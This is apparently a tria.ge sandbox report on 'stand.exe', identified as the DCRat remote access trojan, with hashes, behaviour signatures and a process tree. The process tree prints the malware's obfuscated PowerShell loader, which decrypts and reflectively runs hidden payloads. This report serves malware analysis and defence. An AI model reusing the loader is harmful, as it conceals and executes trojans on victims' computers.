Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
94s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25/01/2025, 00:45
Static task
static1
Behavioral task
behavioral1
Sample
stand.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
stand.exe
Resource
win10v2004-20241007-en
General
-
Target
stand.exe
-
Size
40.8MB
-
MD5
9901c3d5708e8490d8ba6d3732fd4a64
-
SHA1
a40f732caa8e91909dc929df14ad003aeb9bde42
-
SHA256
067672927a61dc4b5d2c1850c4b6219ff42537b0758475dae2a43ddb0250f0c8
-
SHA512
8f310f41f3366a65be2f43437796cae84c0a8e0881d7ee1488468cd41a66f4b45e6ffcd85447ff935856b5fd9de601f2551cd710e8a50adc1c30641627acc856
-
SSDEEP
393216:f1Du8BtuBw2FEL3Z3aLUoQvo6LP/SgbSpYvKEh1EdKwlGQKPJuGsiTfREsrgCYfC:fMguj8Q4VfvCqFTrYZ7ORuV0gAX
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
DCRat payload 1 IoCs
resource yara_rule behavioral2/memory/4188-54-0x00000000140A0000-0x0000000014754000-memory.dmp family_dcrat_v2 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4188 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 936 powershell.exe 936 powershell.exe 4188 powershell.exe 4188 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 936 powershell.exe Token: SeDebugPrivilege 4188 powershell.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 4248 wrote to memory of 4436 4248 stand.exe 82 PID 4248 wrote to memory of 4436 4248 stand.exe 82 PID 4248 wrote to memory of 2984 4248 stand.exe 83 PID 4248 wrote to memory of 2984 4248 stand.exe 83 PID 4436 wrote to memory of 936 4436 cmd.exe 84 PID 4436 wrote to memory of 936 4436 cmd.exe 84 PID 936 wrote to memory of 1096 936 powershell.exe 85 PID 936 wrote to memory of 1096 936 powershell.exe 85 PID 1096 wrote to memory of 1344 1096 csc.exe 86 PID 1096 wrote to memory of 1344 1096 csc.exe 86 PID 2984 wrote to memory of 4188 2984 cmd.exe 87 PID 2984 wrote to memory of 4188 2984 cmd.exe 87 PID 2984 wrote to memory of 4188 2984 cmd.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\stand.exe"C:\Users\Admin\AppData\Local\Temp\stand.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Windows\system32\cmd.execmd.exe /C call powershell -E QQBkAGQALQBUAHkAcABlACAAQAAiAAoAIAAgACAAIAB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AAoAIAAgACAAIAB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAVQB0AGkAbABzACAAewAKACAAIAAgACAAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApADsACgAgACAAIAAgACAAIAAgACAACgAgACAAIAAgACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AFAAYQByAGUAbgB0ACgASQBuAHQAUAB0AHIAIABoAFcAbgBkACkAOwAKAAoAIAAgACAAIAAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFMAaABvAHcAVwBpAG4AZABvAHcAKABJAG4AdABQAHQAcgAgAGgAVwBuAGQALAAgAGkAbgB0ACAAbgBDAG0AZABTAGgAbwB3ACkAOwAKACAAIAAgACAAIAAgACAAIAAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABHAGUAdABUAGEAcgBnAGUAdABXAGkAbgBkAG8AdwAoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHQAUAB0AHIAIABjAG8AbgBzAG8AbABlAFcAaQBuAGQAbwB3ACAAPQAgAEcAZQB0AEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdABQAHQAcgAgAHAAYQByAGUAbgB0AFcAaQBuAGQAbwB3ACAAPQAgAEcAZQB0AFAAYQByAGUAbgB0ACgAYwBvAG4AcwBvAGwAZQBXAGkAbgBkAG8AdwApADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAcABhAHIAZQBuAHQAVwBpAG4AZABvAHcAIAA9AD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AKQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAYwBvAG4AcwBvAGwAZQBXAGkAbgBkAG8AdwA7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAcABhAHIAZQBuAHQAVwBpAG4AZABvAHcAOwAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9AAoAIgBAAAoACgBbAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAVQB0AGkAbABzAF0AOgA6AFMAaABvAHcAVwBpAG4AZABvAHcAKABbAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAVQB0AGkAbABzAF0AOgA6AEcAZQB0AFQAYQByAGcAZQB0AFcAaQBuAGQAbwB3ACgAKQAsACAAMAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=2⤵
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -E QQBkAGQALQBUAHkAcABlACAAQAAiAAoAIAAgACAAIAB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AAoAIAAgACAAIAB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAVQB0AGkAbABzACAAewAKACAAIAAgACAAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApADsACgAgACAAIAAgACAAIAAgACAACgAgACAAIAAgACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AFAAYQByAGUAbgB0ACgASQBuAHQAUAB0AHIAIABoAFcAbgBkACkAOwAKAAoAIAAgACAAIAAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFMAaABvAHcAVwBpAG4AZABvAHcAKABJAG4AdABQAHQAcgAgAGgAVwBuAGQALAAgAGkAbgB0ACAAbgBDAG0AZABTAGgAbwB3ACkAOwAKACAAIAAgACAAIAAgACAAIAAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABHAGUAdABUAGEAcgBnAGUAdABXAGkAbgBkAG8AdwAoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHQAUAB0AHIAIABjAG8AbgBzAG8AbABlAFcAaQBuAGQAbwB3ACAAPQAgAEcAZQB0AEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdABQAHQAcgAgAHAAYQByAGUAbgB0AFcAaQBuAGQAbwB3ACAAPQAgAEcAZQB0AFAAYQByAGUAbgB0ACgAYwBvAG4AcwBvAGwAZQBXAGkAbgBkAG8AdwApADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAcABhAHIAZQBuAHQAVwBpAG4AZABvAHcAIAA9AD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AKQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAYwBvAG4AcwBvAGwAZQBXAGkAbgBkAG8AdwA7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAcABhAHIAZQBuAHQAVwBpAG4AZABvAHcAOwAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9AAoAIgBAAAoACgBbAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAVQB0AGkAbABzAF0AOgA6AFMAaABvAHcAVwBpAG4AZABvAHcAKABbAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAVQB0AGkAbABzAF0AOgA6AEcAZQB0AFQAYQByAGcAZQB0AFcAaQBuAGQAbwB3ACgAKQAsACAAMAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0yqkeiva\0yqkeiva.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES829D.tmp" "c:\Users\Admin\AppData\Local\Temp\0yqkeiva\CSC8FCC90FCE1A9493DAB9FDC81EE9179.TMP"5⤵PID:1344
-
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /C call C:\Users\Admin\AppData\Local\Temp\0a3d16499458c600638ec5e6d6c1bd53.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ICpOoyhUti8BdlSJuUCEIa6Q39T7JjCqop5o7I6byi8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZmZQPrw6g3+sWWIFVPCrdA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UCWxB=New-Object System.IO.MemoryStream(,$param_var); $ncHMf=New-Object System.IO.MemoryStream; $LIAho=New-Object System.IO.Compression.GZipStream($UCWxB, [IO.Compression.CompressionMode]::Decompress); $LIAho.CopyTo($ncHMf); $LIAho.Dispose(); $UCWxB.Dispose(); $ncHMf.Dispose(); $ncHMf.ToArray();}function execute_function($param_var,$param2_var){ $zLBxA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ByaAN=$zLBxA.EntryPoint; $ByaAN.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\0a3d16499458c600638ec5e6d6c1bd53.bat';$tYUab=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\0a3d16499458c600638ec5e6d6c1bd53.bat').Split([Environment]::NewLine);foreach ($bLFgp in $tYUab) { if ($bLFgp.StartsWith(':: ')) { $FNCNo=$bLFgp.Substring(3); break; }}$payloads_var=[string[]]$FNCNo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4188
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD52f996b44e71bcf8e9d9bd5ef2a96a963
SHA161a10fcfb7bad1271f7132c7491982a916489af0
SHA25678d612ffa268c2871faf8e656889f9ec6475890ff2763410dbf434a343ad9a0d
SHA51284815d678a672aa99d4834fa4c0a42089bec36da593caabc337dc66180a8ebd0131e65fb68ba645d3d68e80a5e7808e0dcf5b0ff1cb2a46786d532b088b44515
-
Filesize
5.2MB
MD506fc9a6f1de1042d9248e64db6640406
SHA130b9aa888c1413deec441ad4aa20d8f838b0b801
SHA25691290c338166483cc3bf9196c1091cc76a021716ebb9de7d4ec35470c3360560
SHA512773baceebd84f09cd53d56765009724e4d706f09b0a741ff3b498c9cd39e01dcad471f1ad0f5d2e08a3ed6e4163ffc4564472b2bddd69862a4040dde9fe80321
-
Filesize
3KB
MD5241dd5eae997b9ae214ec802b5f275a3
SHA1fef102f0aace7b3fa791c7d0f7dcb9d5e6902784
SHA25616d15e367aaae916449d6a07772c1b1b475f6f36d59ac3a7663d2580fba5ffb2
SHA5121f0553a0eb0cfc6b899c7ce73e6f787dd5b03661eacf71e7630f93cbf92abc962173a6ef2bfabf2580112b17a17da0207a56e2f8080f072fdf839a818f640b42
-
Filesize
1KB
MD537895bf115bd5da15aeff6a142596abc
SHA1bd6555329afc5f13caecf25d6fa36e7aa0bbacad
SHA256b22cade65fcb79d2d21b7647ad920370f08972627e129f7ef442d1713a04232b
SHA51242c51e145676fbfc0339b288d1a39b091a449f0cf81b31a11fe75e8a7febb8196ff4a8ea5c984387bb827dcac439e22af907e0924e21c4ad3d60bbda4b0a7de4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
737B
MD53d57f8f44297464baafa6aeecd3bf4bc
SHA1f370b4b9f8dba01fbcad979bd663d341f358a509
SHA256415199eec01052503978381a4f88f4cd970b441fedce519905990ed8b629b0f1
SHA5124052dd65ca0a505a36c7c344671afcadb8f82cc24b0d1d8362f61565f9d37782e00332908444f6a95286dd1785d074762b27c20be1f361eec67807fad052d798
-
Filesize
369B
MD5b4d6c59b3f0c2bc8450ad456eae586af
SHA1c1fac48d0460dccbee9eb4ceff143e4a2410459b
SHA256e9fcdb20862b4af335e0f675a2c5e8aa55fd2130c5d4f5003909468d68a83251
SHA512a72814d15fe23b8069a69aa071fe0092b4bcfa847292edaa249289a4197f951da09bdecf1345a0bb2f23298b02db3ae5e8c4adda85b60386ffa1ee86cf465228
-
Filesize
652B
MD5a2b41ea0b931f2f272db6bce0d9990f4
SHA1a3aef3df93b4305e196768b5c612fc2e0a42d067
SHA2562cba6bbb9f8ffa7ab0a309503959f6cbe383ea3a0ab20a365e5f7196d9bd6929
SHA512942a7a31e1dd0438afc4704d235e723e7566e2ee1c6903883feecc40516da00101b68ee82785e906be8ae8173205a65854a633105056db557825e3f094a5d571